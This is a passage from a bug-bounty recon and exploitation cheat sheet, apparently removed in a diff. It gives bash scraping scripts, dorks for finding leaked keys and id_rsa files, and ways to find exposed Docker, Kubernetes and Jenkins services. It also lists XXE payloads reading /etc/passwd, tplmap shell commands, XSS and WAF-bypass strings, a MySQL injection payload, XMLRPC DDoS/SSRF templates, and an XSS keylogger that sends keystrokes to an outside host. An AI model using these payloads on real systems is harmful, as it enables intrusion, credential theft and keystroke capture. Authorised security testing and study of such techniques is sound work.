746	-	This is a good tactic as sometimes devs will hardcore API keys/tokens etc in Javascript files without realising.
747	-
748	-	Stored as GetJSFiles.sh in my repo :)
749	-
750	-	#!/bin/bash
751	-	mkdir scripts
752	-	mkdir scriptsresponse
753	-	RED='\033[0;31m'
754	-	NC='\033[0m'
755	-	CUR_PATH=$(pwd)
756	-	for x in $(ls "$CUR_PATH/responsebody")
757	-	do
758	-	printf "\n\n${RED}$x${NC}\n\n"
759	-	END_POINTS=$(cat "$CUR_PATH/responsebody/$x" \| grep -Eoi "src=\"[^>]+></script>" \| cut -d '"' -f 2)
760	-	for end_point in $END_POINTS
761	-	do
762	-	len=$(echo $end_point \| grep "http" \| wc -c)
763	-	mkdir "scriptsresponse/$x/"
764	-	URL=$end_point
765	-	if [ $len == 0 ]
766	-	then
767	-	URL="https://$x$end_point"
768	-	fi
769	-	file=$(basename $end_point)
770	-	curl -X GET $URL -L > "scriptsresponse/$x/$file"
771	-	echo $URL >> "scripts/$x"
772	-	done
773	-	done
774	-
775	-
776	-	This method can be a little slow as there is no multithreading involved, but works perfect for smaller programs :)
777	-	```
778	-
779	-	JavaScript Link Finder
780	-
781	-	```
782	-	#https://github.com/GerbenJavado/LinkFinder
783	-
784	-	LinkFinder is one of the best tools for parsing endpoints from JavaScript files. The tool works by using JSBeautifier under the hood alongside a list of regexes to find URL patterns.
785	-
786	-	We can simple pass a .js file locally and it will parse all links contained within the JS files, great for finding endpoints.
787	-
788	-	Of course if we combine this with the technique above we can usually find quite a lot.
789	-
790	-	python $Tools/LinkFinder -i m0chan.js -o cli
791	-	```
792	-
793	-	JsSearch
794	-
795	-	```
796	-	#https://github.com/incogbyte/jsearch
797	-
798	-	JsSearch is another handy JavaScript parser except this tool aims to find sensitive or interesting strings within JSFiles instead of endpoints. As we know sometimes developers can hardcore API keys etc in JS files and forget.
799	-
800	-	python3.7 $Tools/jsearch/jsearch.py -u https://starbucks.com -n Starbucks
801	-
802	-	This tool is handy as it does not require the files to be stored locally and can simply take a domain as input and recursively crawl and analyse.
803	-
804	-	Although I recommened you add your own regexes as the default colletion is quite minimal.
805	-
806	-
807	-	```
808	-
809	-	Finding Hidden Endpoints from Scraped JS Files
810	-
811	-	```
812	-	#Reference: https://medium.com/bugbountywriteup/fasten-your-recon-process-using-shell-scripting-359800905d2a
813	-
814	-	#Dependancy: https://github.com/jobertabma/relative-url-extractor
815	-
816	-	Similar to the previous scripts this bash script will require the previous scripts to be run as it relys on the output.
817	-
818	-	What we do here is parse the relative paths present in the scraped JS Files, this way we can find some interesting endpoints and configurations which may have some vulnerable parameters.
819	-
820	-	Providing we have 'relative-url-extractor' installed we can use the following bash script to achieve what we need.
821	-
822	-	Stored in my Repo as HiddenEndpointLoop.sh
823	-
824	-	#!/bin/bash
825	-	#looping through the scriptsresponse directory
826	-	mkdir endpoints
827	-	CUR_DIR=$(pwd)
828	-	for domain in $(ls scriptsresponse)
829	-	do
830	-	#looping through files in each domain
831	-	mkdir endpoints/$domain
832	-	for file in $(ls scriptsresponse/$domain)
833	-	do
834	-	ruby ~/relative-url-extractor/extract.rb scriptsresponse/$domain/$file >> endpoints/$domain/$file
835	-	done
836	-	done
837	-
838	-
839	-	```
840	-
841	-	Fuzzing URL Parameters
842	-
843	-	```
844	-	#https://www.hackplayers.com/2018/08/aron-parametros-get-post-bruteforce.html
845	-	#https://github.com/m4ll0k/Aron
846	-
847	-	GET Bruteforce
848	-
849	-	$ go run aron.go -url http://www.test.com/index.php -get
850	-	$ go run aron.go -url http://www.test.com/index.php<[?\|id=1\|id=1&]> -get
851	-	$ go run aron.go -url http://www.test.com/index.php<[?\|id=1\|id=1&]> -get -wordlist $Tools/Aron/dict.txt
852	-
853	-
854	-	POST Bruteforce
855	-
856	-	$ go run aron.go -url http://www.test.com/index.php -post
857	-	$ go run aron.go -url http://www.test.com/index.php<[?id=1]> -post
858	-	$ go run aron.go -url http://www.test.com/index.php<[?id=1]> -post -data "user=1"
859	-	$ go run aron.go -url http://www.test.com/index.php<[?id=1]> -post -data "user=1" -wordlist dict.txt
860	-	```
861	-
862	-	Port Scanning Subdomains
863	-
864	-	```
865	-	I won't get into this much as it's fairly straight forward, simply parse your subdomains.resolved too nmap with your preferred syntax and let it run away.
866	-
867	-	Small Tips:
868	-
869	-	1) Run this on a VPS (Linode.com is my go-to)
870	-	2) Run inside a screen session with Screen -SmL
871	-	3) Pipe the output with \| tee
872	-
873	-	Btw, some people will tell you to use massscan due to the speed but I find it misses a lot of ports so VPS+ nMap + Screen is the most reliable.
874	-	```
875	-
876	-	Aquatone
877	-
878	-	```
879	-	#https://github.com/michenriksen/aquatone/
880	-
881	-	Aquatone allows us to easily screenshot and port scan subdomains. Very fast as it is written in Go.
882	-
883	-	cat hosts.txt \| aquatone -ports 80,443,3000,3001
884	-
885	-	small: 80, 443
886	-	medium: 80, 443, 8000, 8080, 8443 (same as default)
887	-	large: 80, 81, 443, 591, 2082, 2087, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888
888	-	xlarge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2087, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 12443, 16080, 18091, 18092, 20720, 28017
889	-	```
890	-
891	-	#### Google Dorks
892	-
893	-	#### Bug Bounty Helper Tool (Perfect for All Dorks) <a href="#bug-bounty-helper-tool-perfect-for-all-dorks" id="bug-bounty-helper-tool-perfect-for-all-dorks"></a>
894	-
895	-	```
896	-	https://dorks.faisalahmed.me/#
897	-
898	-	Just enter your domain/subdomain and select which you would like to dork for
899	-	```
900	-
901	-	```
902	-	https://drive.google.com/file/d/1g-vWLd998xJwLNci7XuZ6L1hRXFpIAaF/view
903	-
904	-	site:your-target.com inurl:id=
905	-	site:your-target.com filetype:php
906	-	site:your-target.com intitle:upload
907	-	inurl:”.php?id=” intext:”View cart”
908	-	inurl:”.php?cid=” intext:”shopping”
909	-	inurl:/news.php?include=
910	-	inurl:”.php?query=”
911	-
912	-
913	-	#Open Redirect
914	-	inurl:url=https
915	-	inurl:url=http
916	-	inurl:u=https
917	-	inurl:u=http
918	-	inurl:redirect?https
919	-	inurl:redirect?http
920	-	inurl:redirect=https
921	-	inurl:redirect=http
922	-	inurl:link=http
923	-	inurl:link=https
924	-	inurl:redirectUrl=http site:paypal.com
925	-
926	-	#Codepad - Online Interpreter/Compiler, Sometimes Hard Coded Creds
927	-	site:codepad.co "Tesla"
928	-
929	-	#Scribd - EBooks / Although Sometimes Internal Files
930	-	site:scribd.com "Tesla"
931	-
932	-	#NodeJS Source
933	-	site:npmjs.com "Tesla"
934	-	site:npm.runkit.com "Tesla"
935	-
936	-	#Libararies IO
937	-	site:libraries.io "Tesla"
938	-
939	-	#Coggle - MindMapping Software
940	-	site:coggle.it "Tesla"
941	-
942	-	#Papaly
943	-	site:papaly.com "Tesla"
944	-
945	-	#Trello - Board Software
946	-	site:trello.com "Tesla"
947	-
948	-	#Prezi - Presentation Software
949	-	site:prezi.com "Tesla"
950	-
951	-	#JSDeliver - CDN for NPM & GitHub
952	-	site:jsdelivr.net "Tesla"
953	-
954	-	#Codepen - Online Coding Tool
955	-	site:codepen.io "Tesla"
956	-
957	-	#Pastebin - Online Txt Sharing
958	-	site:pastebin.com "Tesla"
959	-
960	-	#Repl - Online Compiler
961	-	site:repl.it "Tesla"
962	-
963	-	#Gitter - Open Source Messaging
964	-	site:gitter.im "Tesla"
965	-
966	-	#BitBucket - Similar to GitHub can Store Source Code
967	-	site:bitbucket.org "Tesla"
968	-
969	-	#Atlassian - Useful to find Confluence and Jira
970	-	site:*.atlassian.net "Tesla"
971	-
972	-	#Gitlab - Source Code
973	-	inurl:gitlab "Tesla"
974	-
975	-	#Find S3 Buckets
976	-	site:.s3.amazonaws.com "Tesla"
977	-
978	-	To simplify this process I copy the above into Sublime and copy replace Tesla with the Target name and then open all queries at once with the following chrome extension ;)
979	-
980	-	https://chrome.google.com/webstore/detail/openlist/nkpjembldfckmdchbdiclhfedcngbgnl?hl=en
981	-
982	-	We can also find specific content by appending the "ext:pdf or ext:conf" etc etc
983	-	```
984	-
985	-	### Fingerprinting
986	-
987	-	During our recon phase and the techniques we employed above we gathered a lot of information about a target from subdomains, CIDR, ASN’s, Endpoints etc but we didn’t really gather HTTP Headers. I did show a few techniques but they probably fit in here more so I’ve just duplicated them for simplicity.
988	-
989	-	Fingerprinting usually consists of using our discovered endpoints and analysing the headers,version numbers, open/closed ports etc.
990	-
991	-	First technique is typically finding the open ports which we could do with nMap but it will take a while especially if we are working on a big program perhaps with tens of thousands of IP’s. If this is the case then it’s probably best to look at Shodan.
992	-
993	-	Shodan Scans the entire internet on a daily basis and provides the data to it’s users (I highly recommend you get a pro account)
994	-
995	-	Shodan Port Scan w/ CIDR
996	-
997	-	```
998	-	shodan.io
999	-
1000	-	net:CIDR/24,CIDR/24
1001	-
1002	-	Example
1003	-
1004	-	net:109.70.100.50/24,89.67.54.0/22
1005	-
1006	-	You could also search via Organistations Name with
1007	-	org:Paypal
1008	-
1009	-	Of course these techniques will only return assets on your targets OWN external network but what about resources hosted with thirdparty cloud providers such as AWS or Azure. One Techn to find these is to search with SSL
1010	-
1011	-	ssl:paypal
1012	-	```
1013	-
1014	-	MassScan
1015	-
1016	-	```
1017	-	#https://github.com/robertdavidgraham/masscan
1018	-
1019	-	MassScan is awesome but truthfully from my experiences it can be very hit or miss and sometimes misses ports, I have tried scanning my VPS with it and it dosent show half the ports. No idea why however its still worth mentioning due to the speed
1020	-
1021	-	sudo masscan -p<Port Here> <CIDR Range Here> --exclude <Exclude IP> --
1022	-	banners -oX <Out File Name>
1023	-
1024	-	You can also use the massscan-web-ui from OffSec or grep the results.
1025	-
1026	-	https://github.com/offensive-security/masscan-web-ui
1027	-	```
1028	-
1029	-	Wappalyzer
1030	-
1031	-	```
1032	-	#https://github.com/vincd/wappylyzer
1033	-
1034	-
1035	-	One of the best tools for identifying the technologies in use on a site, I prefer the chrome plugin or firefox but the script above also works :)
1036	-	```
1037	-
1038	-	WafW00f
1039	-
1040	-	```
1041	-	#https://github.com/EnableSecurity/wafw00f
1042	-
1043	-	Awesome script to detect if your target is protected behind an XSS before you started launching payloads.
1044	-
1045	-	There are also a few cool Burp plugins to faciliate this.
1046	-
1047	-	The great thing about Wafw00f is it will try detect which WAF is in place, for ex. Akami. Once we know the WAF in play we can start lookin for bypasses and other bug submissions that have bypassed this and tailor our payloads to our needs.
1048	-	```
1049	-
1050	-	### Finding Sensitive Loot
1051	-
1052	-	I wasn’t sure if I should put this under Exploitation but guess it’s own section is fitting, a few techniques to find sensitive files that may have been pushed to github etc.
1053	-
1054	-	Github Dorking
1055	-
1056	-	```
1057	-	Similar to Shodan dorks etc we can pass dorks ot github to search repos alongside certain search terms such as filename etc
1058	-
1059	-	For example
1060	-
1061	-	filename:.bash_history paypal.com
1062	-	filename:id_rsa paypal.com
1063	-	filename:token paypal.com
1064	-	filename:apikey paypal.com
1065	-	language:python username paypal.com
1066	-	language:python:username
1067	-
1068	-	app.secret.key is also a good one to search for.
1069	-
1070	-
1071	-	There is a awesome list of dorks located here
1072	-
1073	-	#https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt
1074	-
1075	-
1076	-	Its very common for devs to accidently push
1077	-	```
1078	-
1079	-	![](https://miro.medium.com/max/1024/0\*ddmcCZ14kuMdHBPC.png)
1080	-
1081	-	GitMiner
1082	-
1083	-	```
1084	-	#https://github.com/UnkL4b/GitMiner
1085	-
1086	-	$:> python3 gitminer-v2.0.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txt
1087	-
1088	-	$:> python3 gitminer-v2.0.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
1089	-
1090	-	$:> python3 gitminer-v2.0.py --query 'filename:shadow path:etc' -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
1091	-
1092	-	$:> python3 gitminer-v2.0.py --query 'filename:configuration extension:php "public password" in:file' -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
1093	-
1094	-	Full List of Dorks Here
1095	-
1096	-	https://github.com/UnkL4b/GitMiner
1097	-	```
1098	-
1099	-	Finding Subdomains That Resolve to Internal IP
1100	-
1101	-	```
1102	-	cat domains.txt \| while read domain; do if host -t A "$domain" \| awk '{print $NF}' \| grep -E '^(192\.168\.\|172\.1[6789]\.\|172\.2[0-9]\.\|172\.3[01]\.\|10\.)' &>/dev/null; then echo $domain; fi; done
1103	-	```
1104	-
1105	-	### Exploitation
1106	-
1107	-	This is a hard section to type up as some techniques may fall under other headings :) also I probably won’t mention XSS & SQLi as they are the basics and lots of resources already exist.
1108	-
1109	-	Unauthenticated Elastic Search
1110	-
1111	-	```
1112	-	“ES is a document-oriented database designed to store, retrieve, and manage document-oriented or semi-structured data"
1113	-
1114	-	Elastic Search has a HTTP Server running on Port 9200 that can be used to query the database and sometimes it supports unauthenticated access.
1115	-
1116	-	We can find these servers by scanning for Port 9200 or the Shodan Dork below.
1117	-
1118	-	port:"9200" elastic
1119	-	```
1120	-
1121	-	Unauthenticated Docker API
1122	-
1123	-	```
1124	-	Similar to Elastic Search, Docker has some servies that can be exposed that may be an easy win. Mainly when you install docker on system it will pose an API on your localhost on Port 2375. As its on localhost by default you cant interact however in certain instances this is changed and it is available.
1125	-
1126	-	Shodan Dorks come in Handy here
1127	-
1128	-	port:"2375" docker
1129	-	product:docker
1130	-
1131	-	If you find a endpoint you can verifiy that its vulnerable by making a GET request too `/version`
1132	-
1133	-	From here you can connect with the CLI version of Docker
1134	-
1135	-	docker -H ip:port ps
1136	-	```
1137	-
1138	-	Unauthenticated Kubernetes API
1139	-
1140	-	```
1141	-	First let me say I am no Kubernetes expert but I know it exists and has similar vulns like DockerAPI & Elastic Search and thats all I need to know for hunting.
1142	-
1143	-	Kubernetes exposes an unauthenticated REST API on port 10250
1144	-
1145	-	Once again we have 2 options, nMap for this port or shodan
1146	-
1147	-	product:"kubernetes"
1148	-	port:"10250"
1149	-
1150	-	Once a Kubernetes service is detected the first thing to do is to get a list of pods by sending a GET request to the /pods endpoint.
1151	-
1152	-
1153	-	apt-get install node-ws
1154	-	wscat -c “https://<DOMAIN>:<PORT>/<Location Header Value>” –no-check
1155	-
1156	-	Its very easy to get RCE from this method :)
1157	-	```
1158	-
1159	-	Unauthenticated odoo Manager
1160	-
1161	-	```
1162	-	Shodan Dork
1163	-
1164	-	http.status:200 http.component:odoo port:8069
1165	-
1166	-	After finding instances go to /web/database/manager most of the time there is either no password or it's "admin"
1167	-
1168	-	Or simply port scan for 8069
1169	-	```
1170	-
1171	-	Unauthenticated Jenkins Instance
1172	-
1173	-	```
1174	-	Sometimes an application will be running Jenkins which allows Guest/Anonymous signups with /script enabled which allows code exec
1175	-
1176	-	Also if you can install plugins there is a terminal plugin
1177	-
1178	-	Try dirsearch for /script or use this script to find live Jenkins instances.
1179	-
1180	-	Also worth checking Port 8080 alongside 443,80
1181	-
1182	-
1183	-	I recommened if you are working on a big program with thousands of domains to grep for jenkins and pipe all subdomains into full tcp ports scans. Sometimes the instance can be running on a weird port :)
1184	-
1185	-
1186	-	Also grep for these headers
1187	-
1188	-	X-Hudson: 1.395
1189	-	X-Jenkins: 2.204.2
1190	-	X-Jenkins-Session: d615ef86
1191	-	X-You-Are-Authenticated-As: anonymous
1192	-	X-You-Are-In-Group-Disabled: JENKINS-39402:
1193	-
1194	-
1195	-	Shodan Dork to Find Open Jenkins Instances
1196	-
1197	-	x-jenkins 200
1198	-	```
1199	-
1200	-	XML External Entity (XXE)
1201	-
1202	-	```
1203	-
1204	-	#https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
1205	-
1206	-	XML is essential a language designed to transport data in a structured format, ,similar to JSON.
1207	-
1208	-	Basic XXE Check
1209	-
1210	-	<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data SYSTEM "http://123123123.burpcollaborator.net/m0chan.dtd"><data>&all;</data>
1211	-
1212	-	XXE is a vuln that occurs when an application parses XML.
1213	-
1214	-
1215	-	<?xml version="1.0"?>
1216	-	<!DOCTYPE note [
1217	-	<!ENTITY user "m0chan">
1218	-	<!ENTITY message "m0chanmessage">
1219	-	]>
1220	-
1221	-	In this example the ENTITY user holds the info m0chan which can be called with &user
1222	-
1223	-	Now this is useful as we get something called EXTERNAL ENTITY which will load the data from a external resource in comparison to something "local"
1224	-
1225	-	Examples:
1226	-
1227	-	<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://m0chan.github.io" > ]>
1228	-	<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
1229	-
1230	-
1231	-	We could also combine this with PHP Object Injection (More on that below) to have a payload like this
1232	-
1233	-	<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/etc/issue' >]>
1234	-
1235	-	Testing the Waters
1236	-
1237	-	<?xml version="1.0" encoding="utf-8"?>
1238	-
1239	-	Testing the Waters #2
1240	-
1241	-
1242	-	<?xml version="1.0" encoding="UTF-8"?>
1243	-	<!DOCTYPE test [
1244	-	<!ENTITY % m0chan SYSTEM "file:///etc/passwd">
1245	-	%m0chan;
1246	-	]>
1247	-
1248	-	<?xml version="1.0" encoding="ISO-8859-1"?>
1249	-	<!DOCTYPE foo [
1250	-	<!ELEMENT foo ANY >
1251	-	<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
1252	-	<foo>
1253	-	&xxe;
1254	-	</foo>
1255	-
1256	-
1257	-	Base64
1258	-
1259	-	<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
1260	-
1261	-
1262	-	This is the basis, if you want the proper example go and buy the Bug Bounty Playbook.pdf :) Its my favourite book for bug bounty.
1263	-	```
1264	-
1265	-	PHP Object Injection
1266	-
1267	-	```
1268	-	#https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/
1269	-
1270	-
1271	-	```
1272	-
1273	-	Server-Side-Request-Forgery
1274	-
1275	-	```
1276	-	#https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
1277	-	I am not going to explain SSRF here as its fairly straight forward and a lot of resources exist, I will drop a few payloads I grabbed off twitter recently though.
1278	-
1279	-	For other payloads check out Payload All The Things
1280	-	```
1281	-
1282	-	Amazing SSRF Mindmap - Credit @hackerscrolls
1283	-
1284	-	Server-Side-Request-Forgery Pt (PDF Convertors)
1285	-
1286	-	```
1287	-	Sometimes you may run into instances where applications are accepting arbitary file types and converting them to PDF, if so we can try inject html/javascript into the input and see if it is interpreted server side.
1288	-
1289	-	Server Side JavaScript Execution -> XMLHttpRequest -> SSRF
1290	-
1291	-	Also
1292	-
1293	-	Server Side JavaScript Execution -> XMLHttpRequest -> Local File Read (file://)
1294	-
1295	-	References: https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html
1296	-	https://www.youtube.com/watch?v=o-tL9ULF0KI&t=753s
1297	-
1298	-	```
1299	-
1300	-	Attacking AWS with SSRF
1301	-
1302	-	```
1303	-	#https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/ssrf
1304	-
1305	-	Amazon AWS has a internal metadata service which can be queired from most instances which gives us a great local service to try query if we believe the underlying platform is being serviced by AWS such as Elastic Beanstalk etc.
1306	-
1307	-	Reference: https://medium.com/@GeneralEG/escalating-ssrf-to-rce-f28c482eb8b9
1308	-
1309	-
1310	-	169.254.169.254 - Local EC2 Instance Address to Query
1311	-
1312	-	From here it can be very easy to escalate to RCE by gaining read/write on the bucket and uploading a shell.
1313	-
1314	-	```
1315	-
1316	-	GraphQL Injection
1317	-
1318	-	```
1319	-	#https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
1320	-	More on this soon :)
1321	-
1322	-	```
1323	-
1324	-	Server Side Template Injection (SSTI)
1325	-
1326	-	```
1327	-	#https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
1328	-	More on this soon :)
1329	-
1330	-	My primary goto for exploiting SSTI issues is tplmap which is really just sqlmap for template injection vulnerabilities.
1331	-
1332	-	#https://github.com/epinna/tplmap
1333	-
1334	-	$ ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
1335	-
1336	-	$ ./tplmap.py -u 'http://www.target.com/page?name=John'
1337	-	[+] Tplmap 0.5
1338	-	Automatic Server-Side Template Injection Detection and Exploitation Tool
1339	-
1340	-	[+] Testing if GET parameter 'name' is injectable
1341	-	[+] Smarty plugin is testing rendering with tag '{*}'
1342	-	[+] Smarty plugin is testing blind injection
1343	-	[+] Mako plugin is testing rendering with tag '${*}'
1344	-	...
1345	-	[+] Jinja2 plugin is testing rendering with tag ''
1346	-	[+] Jinja2 plugin has confirmed injection with tag ''
1347	-	[+] Tplmap identified the following injection point:
1348	-
1349	-	GET parameter: name
1350	-	Engine: Jinja2
1351	-	Injection:
1352	-	Context: text
1353	-	OS: linux
1354	-	Technique: render
1355	-	Capabilities:
1356	-
1357	-	Shell command execution: ok
1358	-	Bind and reverse shell: ok
1359	-	File write: ok
1360	-	File read: ok
1361	-	Code evaluation: ok, python code
1362	-
1363	-	```
1364	-
1365	-	Cross-Site Web Socket Hijacking (CSWSH)
1366	-
1367	-	```
1368	-
1369	-	Websockets are fairly rare but essentially they allow an application too set up a full duplex communcation allowing users to read and post data simultaneously
1370	-
1371	-	Common apps using WebSockers are Chat applications as they want to read/send data at the same time.
1372	-
1373	-
1374	-	CSWSH is similar to CSRF as we use the targets cookie to make the request, we also require the target to visit a page served by us, the difference is instead of sending a POST request in the context of the user we send a websocket connection.
1375	-
1376	-	We can use this website to test for the vuln http://websocket.org/echo.html
1377	-
1378	-	To Test for this we do the following
1379	-
1380	-	1) Log into Website using WebSockets
1381	-	2) Open Second Tab
1382	-	3) Visit Link http://websocket.org/echo.html
1383	-	4) Test if we can make connections as the client.
1384	-
1385	-
1386	-	There is a nice PoC on the Bug Bounty Playbook
1387	-	```
1388	-
1389	-	Cross-Site Scripting (XSS)
1390	-
1391	-	```
1392	-	#https://github.com/PortSwigger/xss-validator
1393	-
1394	-	#https://github.com/payloadbox/xss-payload-list
1395	-
1396	-	1) Start xss.js phantomjs $HOME/.BurpSuite/bapps/xss.js
1397	-	2) Send Request to Intruder
1398	-	3) Mark Position
1399	-	4) Import xss-payload-list from $Tools into xssValidator
1400	-	5) Change Payload Type to Extension Generated
1401	-	6) Change Payload Process to Invoke-Burp Extension - XSS Validator
1402	-	7) Add Grep-Match rule as per XSS Validator
1403	-	8) Start.
1404	-
1405	-
1406	-	Succesful Payloads so Far
1407	-
1408	-	<p ondragend=[1].map(prompt) draggable="true">dragMe</p>
1409	-
1410	-	<img/src=x onerror=prompt(1)>
1411	-
1412	-
1413	-	I had success recently also by uploading a .html file with pdf magic bytes at the strat with arbitary javascript to obtain stored XSS on a program.
1414	-
1415	-	Payload Below:
1416	-
1417	-
1418	-	%PDF-1.4
1419	-	%Ã¤Ã¼Ã¶ÃŸ
1420	-	2 0 obj
1421	-	<</Length 3 0 R/Filter/FlateDecode>>
1422	-	stream
1423	-	xœ=ŽË
1424	-	1E÷ùŠ»v“¶é´0è~ àø
1425	-	R
1426	-	R<h1>This is NOT a PDF!</h1> <img src=x onerror=alert(document.cookie)>
1427	-	```
1428	-
1429	-	Cross-Site Scripting Keylogger
1430	-
1431	-	```
1432	-	Easy JavaScript Keylogger with IMG Tags. Useful for XSS with Login Forms present.
1433	-
1434	-	<img src=x onerror='document.onkeypress=function(e){fetch("http://bugcrowd.com/?k="+String.fromCharCode(e.which))},this.remove();'>
1435	-	```
1436	-
1437	-	XMLRPC.php
1438	-
1439	-	```
1440	-
1441	-
1442	-	List all Methods
1443	-	<methodCall>
1444	-	<methodName>system.listMethods</methodName>
1445	-	<params></params>
1446	-	</methodCall>
1447	-
1448	-
1449	-	DDoS
1450	-
1451	-	<methodCall>
1452	-	<methodName>pingback.ping</methodName>
1453	-	<params><param>
1454	-	<value><string>http://<YOUR SERVER >:<port></string></value>
1455	-	</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
1456	-	</value></param></params>
1457	-	</methodCall>
1458	-
1459	-
1460	-	SSRF
1461	-
1462	-	<methodCall>
1463	-	<methodName>pingback.ping</methodName>
1464	-	<params><param>
1465	-	<value><string>http://<YOUR SERVER >:<port></string></value>
1466	-	</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
1467	-	</value></param></params>
1468	-	</methodCall>
1469	-	```
1470	-
1471	-	XXE File Upload SVG
1472	-
1473	-	```
1474	-	#https://scottc130.medium.com/understanding-xxe-vulnerabilities-7e389d3972c2
1475	-
1476	-	<?xml version="1.0" encoding="UTF-8"?>
1477	-	<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
1478	-	<svg>&xxe;</svg>
1479	-
1480	-	<?xml version="1.0" encdoing="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>
1481	-
1482	-	```
1483	-
1484	-	SQL Injection
1485	-
1486	-	```
1487	-
1488	-	1)Error generation with untrusted input or special characters.
1489	-	2)Finding total number of columns with order by or group by or having.
1490	-	3)Finding vulnerable columns with union operator.
1491	-	4)Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat().
1492	-	5)Extracting full table and column names with group_concat() and extracting the data with same function.
1493	-	6)Checking file privileges with file_priv.
1494	-	7)Accessing system files with load_file(). and advance exploitation afterwards.
1495	-	WAF evasion if any.
1496	-	```
1497	-
1498	-	Ultimate MySQL Injection Payload (Detetify)
1499	-
1500	-	```
1501	-	#https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
1502	-
1503	-	IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'\|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"/
1504	-
1505	-
1506	-	```
1507	-
1508	-	JWT Exploiting
1509	-
1510	-	```
1511	-	#https://github.com/wisec/OWASP-Testing-Guide-v5/blob/master/Testing_for_APIs.md
1512	-
1513	-	Full details above.
1514	-
1515	-	1) Access JWT Debugger too base64 decode and ensure that nothing sensitive is being transferred. Make sure no PII is being transferred etc.
1516	-	2) Try chang esome values and obtain IDOR, like `id` or `isAdmin`
1517	-	3) Modigy ALG attribute, set HS256 to null
1518	-
1519	-
1520	-	4) JWT Crack - https://github.com/brendan-rius/c-jwt-cracker - Secret used to encrypt tokens may be weak.
1521	-	```
1522	-
1523	-	Rate Limiting bypass with IP Rotate
1524	-
1525	-	```
1526	-	Sometimes rate limiting for authentication or OTP are based off source IP, this can be bypassed using Amazon API's and IP Rotate.
1527	-
1528	-	https://portswigger.net/bappstore/2eb2b1cb1cf34cc79cda36f0f9019874
1529	-	```
1530	-
1531	-	IDOR Tricks & Bypasses
1532	-
1533	-	```
1534	-	If fields are passed in clientside requests try another db Field - https://twitter.com/m0chan98/status/1286215630253850625/photo/1
1535	-
1536	-
1537	-	https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
1538	-
1539	-	```
1540	-
1541	-	Nuclei
1542	-
1543	-	```
1544	-	Can take numerous templates across various hosts to find known vulnerabilities.
1545	-
1546	-	Requires you specify a custom user agent unless Cloudfare drops all traffic.
1547	-
1548	-	nuclei -l newsubs.httprobe -c 60 -t /root/tools/BotTemplates/ -o newsubs.httprobe.nuclei -H "User-Agent: User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100"
1549	-	```
1550	-
1551	-	Artifactory Stuff
1552	-
1553	-	```
1554	-	#https://www.errno.fr/artifactory/Attacking_Artifactory
1555	-
1556	-	```
1557	-
1558	-	Cross-Site Scripting Bit n Bobs
1559	-
1560	-	```
1561	-	Got a lot to add here (naturally) but for the time being just noting down this bypass.
1562	-
1563	-	If exploiting <a href></a> xss and "javasript" is blocked by WAF or URL then try the below.
1564	-
1565	-	Add any number of \n \t or \r in the middle
1566	-	java\nscript:
1567	-
1568	-	Add characters from \x00- \x20 at the beginning
1569	-
1570	-	\x01javascript:
1571	-
1572	-
1573	-	Randoomize the case
1574	-
1575	-	jaVAscrIpT:
1576	-
1577	-	Can also use the below to get rid of the word JavaScript all together
1578	-
1579	-	\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
1580	-
1581	-	\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
1582	-
1583	-	```
1584	-
